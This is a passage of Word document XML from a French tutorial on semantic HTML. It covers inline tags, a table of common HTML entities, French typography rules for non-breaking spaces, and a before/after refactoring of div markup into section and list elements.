            <w:tcW w:type="dxa" w:w="158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abbr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Abréviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="411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Attribut </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>title</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour la forme complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Citations, code et dates dans un texte éditorial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&lt;p&gt;Comme le rappelle la spécification,</w:t>
        <w:br/>
        <w:t>&lt;q cite="https://html.spec.whatwg.org/"&gt;le langage HTML décrit la</w:t>
        <w:br/>
        <w:t xml:space="preserve">    structure&lt;/q&gt;.&lt;/p&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;blockquote cite="https://www.w3.org/TR/wcag21/"&gt;</w:t>
        <w:br/>
        <w:t>&lt;p&gt;Le contenu doit être perceptible, utilisable, compréhensible et</w:t>
        <w:br/>
        <w:t xml:space="preserve">    robuste.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/blockquote&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;p&gt;Exécutez &lt;kbd&gt;npm run build&lt;/kbd&gt; : la sortie affiche &lt;samp&gt;Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">  complete&lt;/samp&gt;.&lt;/p&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;p&gt;Le paramètre &lt;var&gt;timeout&lt;/var&gt; vaut 30 secondes par défaut.&lt;/p&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;p&gt;Publié le &lt;time datetime="2026-10-19"&gt;19 octobre 2026&lt;/time&gt;.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.6 Caractères spéciaux et entités</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois caractères ont une signification particulière en HTML : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ouvre une balise, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la ferme, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduit une entité. Pour les afficher littéralement, on utilise des entités nommées ou numériques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.15 — Les entités les plus courantes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34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Caractère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Entité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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Écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;lt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;lt;div&amp;gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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&amp;gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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&amp;gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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&amp;laquo;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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&amp;laquo;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;raquo;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;raquo;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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&amp;mdash;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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&amp;mdash;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>espace insécable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;nbsp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12&amp;nbsp;kg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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&amp;copy;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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&amp;copy;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En UTF-8, la plupart des caractères accentués peuvent être saisis directement. Les entités restent utiles pour les caractères ambigus et pour l'espace insécable, qui empêche une coupure malencontreuse entre un nombre et son unité, ou avant les deux-points en français.</w:t>
      </w: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TYPOGRAPHIE FRANÇAISE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Espace insécable avant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et à l'intérieur des guillemets « ... ».</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Tiret cadratin </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour l'incise, trait d'union pour les mots composés.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Points de suspension : trois points, pas six.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les unités prennent une espace insécable : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>12&amp;nbsp;kg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>20&amp;nbsp;°C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.7 Relire et justifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La relecture sémantique consiste à parcourir le document en se demandant, pour chaque élément : « pourquoi cette balise plutôt qu'une autre ? ». Si la réponse est « pour qu'elle ressemble à ceci », la balise est probablement mal choisie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La même page, avant et après la refonte sémantique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 Avant : une suite de div --&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="title"&gt;Nos services&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="item"&gt;&lt;span class="num"&gt;1.&lt;/span&gt; Audit&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="item"&gt;&lt;span class="num"&gt;2.&lt;/span&gt; Conception&lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Après : une structure qui se lit --&gt;</w:t>
        <w:br/>
        <w:t>&lt;section aria-labelledby="services"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2 id="services"&gt;Nos services&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ol&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;Audit&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;Conception&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ol&gt;</w:t>
        <w:br/>
        <w:t>&lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La version de droite est plus courte, plus lisible, et n'a besoin d'aucune classe pour être comprise. Elle se met en forme avec deux sélecteurs au lieu de six.</w:t>
      </w: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Chaque fragment de texte a une nature ; HTML fournit une balise pour l'exprimer.</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hiérarchie des titres est un plan, pas un jeu de tailles.</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br</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sert au contenu (poème, adresse), jamais à l'espacement.</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strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> portent du sens ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne portent qu'une apparence.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Trois listes : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
